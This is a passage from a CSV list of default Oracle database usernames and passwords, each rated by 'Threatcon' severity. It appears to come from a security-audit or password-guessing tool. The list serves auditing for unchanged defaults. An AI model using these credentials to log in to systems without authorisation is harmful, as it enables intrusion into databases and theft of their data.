serious),,\noracle,Database,Any,,AUDIOUSER,AUDIOUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AURORA$JIS$UTILITY$,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AURORA$JIS$UTILITY$,INVALID,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AURORA$JIS$UTILITY$,lt;INVALIDgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AURORA$ORB$UNAUTHENTICATED,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AURORA$ORB$UNAUTHENTICATED,INVALID,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AURORA$ORB$UNAUTHENTICATED,lt;INVALIDgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AX,AX,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,AZ,AZ,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BC4J,BC4J,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BEN,BEN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BIC,BIC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BIL,BIL,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BIM,BIM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BIS,BIS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BIV,BIV,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BIX,BIX,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BLAKE,PAPER,Threatcon 4 (least serious),,\noracle,Database,Any,,BLEWIS,BLEWIS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BOM,BOM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BRIO_ADMIN,BRIO_ADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BRUGERNAVN,ADGANGSKODE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BRUKERNAVN,PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,BSC,BSC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,BUG_REPORTS,BUG_REPORTS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CALVIN,HOBBES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CATALOG,CATALOG,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CCT,CCT,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CDEMO82,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDEMO82,CDEMO82,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDEMO82,CDEMO83,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDEMO82,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDEMOCOR,CDEMOCOR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDEMORID,CDEMORID,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDEMOUCB,CDEMOUCB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CDOUGLAS,CDOUGLAS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CE,CE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CENTRA,CENTRA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CENTRAL,CENTRAL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CIDS,CIDS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CIS,CIS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CIS,ZWERG,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CISINFO,CISINFO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CISINFO,ZWERG,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CLARK,CLOTH,Threatcon 4 (least serious),,\noracle,Database,Any,,CLKANA,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CLKANA,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CLKRT,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CLKRT,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CN,CN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,COMPANY,COMPANY,Threatcon 1 (most serious),,\noracle,Database,Any,,COMPIERE,COMPIERE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CQSCHEMAUSER,PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CQUSERDBUSER,PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CRP,CRP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CS,CS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CSC,CSC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CSD,CSD,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CSE,CSE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CSF,CSF,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CSI,CSI,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CSL,CSL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CSMIG,CSMIG,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CSP,CSP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CSR,CSR,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CSS,CSS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CTXDEMO,CTXDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CTXSYS,,Threatcon 1 (most serious),,\noracle,Database,Any,,CTXSYS,,Threatcon 1 (most serious),,\noracle,Database,Any,,CTXSYS,CHANGE_ON_INSTALL,Threatcon 1 (most serious),,\noracle,Database,Any,,CTXSYS,CTXSYS,Threatcon 1 (most serious),,\noracle,Database,Any,,CTXSYS,UNKNOWN,Threatcon 1 (most serious),,\noracle,Database,Any,,CTXSYS,lt;UNKNOWNgt;,Threatcon 1 (most serious),,\noracle,Database,Any,,CUA,CUA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CUE,CUE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CUF,CUF,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CUG,CUG,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,CUI,CUI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CUN,CUN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CUP,CUP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CUS,CUS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,CZ,CZ,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,DATA_SCHEMA,LASKJDF098KSDAF09,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DBI,MUMBLEFRATZ,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,DBSNMP,DBSNMP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,DBVISION,DBVISION,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DCM,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DCM,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DDIC,199220706,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DEMO,DEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DEMO8,DEMO8,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DEMO9,DEMO9,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DES,DES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DES2K,DES2K,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DEV2000_DEMOS,DEV2000_DEMOS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DIANE,PASSWO1,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DIP,DIP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,DISCOVERER5,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DISCOVERER5,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DISCOVERER_ADMIN,DISCOVERER_ADMIN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,DMSYS,DMSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DPF,DPFPASS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DSGATEWAY,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DSGATEWAY,DSGATEWAY,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DSGATEWAY,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DSSYS,DSSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,DTSP,DTSP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EAA,EAA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,EAM,EAM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,EARLYWATCH,SUPPORT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EAST,EAST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EC,EC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ECX,ECX,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,EJB,EJB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EJSADMIN,EJSADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EJSADMIN,EJSADMIN_PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EMP,EMP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ENG,ENG,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ENI,ENI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ESTOREUSER,ESTORE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EVENT,EVENT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EVM,EVM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,EXAMPLE,EXAMPLE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EXFSYS,EXFSYS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,EXTDEMO,EXTDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,EXTDEMO2,EXTDEMO2,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,FA,FA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FEM,FEM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FII,FII,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FINANCE,FINANCE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,FINPROD,FINPROD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,FLM,FLM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FND,FND,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,FOO,BAR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,FPT,FPT,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FRM,FRM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FROSTY,SNOWMAN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,FTE,FTE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,FV,FV,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GL,GL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,GMA,GMA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GMD,GMD,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GME,GME,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GMF,GMF,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GMI,GMI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GML,GML,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GMP,GMP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GMS,GMS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,GPFD,GPFD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,GPLD,GPLD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,GR,GR,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,HADES,HADES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HCPARK,HCPARK,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HLW,HLW,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HR,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HR,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HR,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HR,HR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HR,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HR,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HRI,HRI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,HVST,HVST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,HXC,HXC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,HXT,HXT,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IBA,IBA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IBE,IBE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IBP,IBP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IBU,IBU,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IBY,IBY,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ICDBOWN,ICDBOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ICX,ICX,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IDEMO_USER,IDEMO_USER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,IEB,IEB,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IEC,IEC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,IEM,IEM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IEO,IEO,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IES,IES,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IEU,IEU,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IEX,IEX,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IFSSYS,IFSSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,IGC,IGC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IGF,IGF,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IGI,IGI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IGS,IGS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IGW,IGW,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IMAGEUSER,IMAGEUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,IMC,IMC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,IMEDIA,IMEDIA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,IMT,IMT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,INTERNAL,ORACLE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,INTERNAL,SYS_STNT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,INV,INV,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IPA,IPA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IPD,IPD,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,IPLANET,IPLANET,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ISC,ISC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ITG,ITG,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JA,JA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JAKE,PASSWO4,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JE,JE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JG,JG,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JILL,PASSWO2,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JL ,JL ,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JL,JL,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JMUSER,JMUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JOHN,JOHN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JONES,STEEL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JTF,JTF,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,JTM,JTM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JTS,JTS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,JWARD,AIROPLANE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,KWALKER,KWALKER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,L2LDEMO,L2LDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,LBACSYS,LBACSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,LIBRARIAN,SHELVES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MANPROD,MANPROD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MARK,PASSWO3,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MASCARM,MANAGER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MASTER,PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDDATA,MDDATA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDDEMO,MDDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDDEMO_CLERK,CLERK,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDDEMO_CLERK,MGR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDDEMO_MGR,MDDEMO_MGR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDDEMO_MGR,MGR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MDSYS,MDSYS,Threatcon 1 (most serious),,\noracle,Database,Any,,ME,ME,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MFG,MFG,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MGR,MGR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MGWUSER,MGWUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MIGRATE,MIGRATE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MILLER,MILLER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MMO2,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MMO2,MMO2,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MMO2,MMO3,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MMO2,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MODTEST,YES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MOREAU,MOREAU,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MRP,MRP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MSC,MSC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MSD,MSD,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MSO,MSO,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MSR,MSR,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MTSSYS,MTSSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MTS_USER,MTS_PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,MWA,MWA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,MXAGENT,MXAGENT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NAMES,NAMES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NEOTIX_SYS,NEOTIX_SYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NNEUL,NNEULPASS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NOMEUTENTE,PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NOME_UTILIZADOR,SENHA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NOM_UTILISATEUR,MOT_DE_PASSE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,NUME_UTILIZATOR,PAROL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OAIHUB902,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OAIHUB902,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OAS_PUBLIC,OAS_PUBLIC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OCITEST,OCITEST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OCM_DB_ADMIN,OCM_DB_ADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ODM,ODM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ODM_MTR,MTRPW,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ODS,ODS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ODSCOMMON,ODSCOMMON,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ODS_SERVER,ODS_SERVER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OE,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OE,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OE,OE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OE,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OEMADM,OEMADM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OEMREP,OEMREP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OEM_REPOSITORY,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OEM_REPOSITORY,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OKB,OKB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OKC,OKC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OKE,OKE,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OKI,OKI,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OKO,OKO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OKR,OKR,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OKS,OKS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OKX,OKX,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OLAPDBA,OLAPDBA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OLAPSVR,INSTANCE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OLAPSVR,OLAPSVR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OLAPSYS,MANAGER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OLAPSYS,OLAPSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OMWB_EMULATION,ORACLE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ONT,ONT,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OO,OO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OPENSPIRIT,OPENSPIRIT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OPI,OPI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,ORACACHE,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORACACHE,ORACACHE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORACACHE,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORACLE,ORACLE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORADBA,ORADBAPASS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORANGE,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORANGE,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORAPROBE,ORAPROBE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORAREGSYS,ORAREGSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORASSO,ORASSO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORASSO_DS,ORASSO_DS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORASSO_PA,ORASSO_PA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORASSO_PS,ORASSO_PS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORASSO_PUBLIC,ORASSO_PUBLIC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORASTAT,ORASTAT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORCLADMIN,WELCOME,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORDCOMMON,ORDCOMMON,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORDPLUGINS,ORDPLUGINS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ORDSYS,ORDSYS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OSE$HTTP$ADMIN,INVALID,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSE$HTTP$ADMIN,Invalid password,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSM,OSM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OSP22,OSP22,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSSAQ_HOST,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSSAQ_HOST,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSSAQ_PUB,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSSAQ_PUB,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSSAQ_SUB,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OSSAQ_SUB,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OTA,OTA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OUTLN,OUTLN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OWA,OWA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OWA_PUBLIC,OWA_PUBLIC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OWF_MGR,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OWF_MGR,OWF_MGR,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OWF_MGR,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OWNER,OWNER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,OZF,OZF,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OZP,OZP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,OZS,OZS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PA,PA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PANAMA,PANAMA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PATROL,PATROL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PAUL,PAUL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PERFSTAT,PERFSTAT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PERSTAT,PERSTAT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PJM,PJM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PLANNING,PLANNING,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PLEX,PLEX,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PLSQL,SUPERSECRET,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PM,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PM,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PM,PM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PM,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PMI,PMI,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PN,PN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PO,PO,Threatcon 1 (most serious),,\noracle,Database,Any,,PO7,PO7,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PO8,PO8,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,POA,POA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,POM,POM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PORTAL,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30,PORTAL30,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30,PORTAL31,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_ADMIN,PORTAL30_ADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_DEMO,PORTAL30_DEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_PS,PORTAL30_PS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_PUBLIC,PORTAL30_PUBLIC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_SSO,PORTAL30_SSO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_SSO_ADMIN,PORTAL30_SSO_ADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_SSO_PS,PORTAL30_SSO_PS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_APP,,Threatcon 3 (1 is most 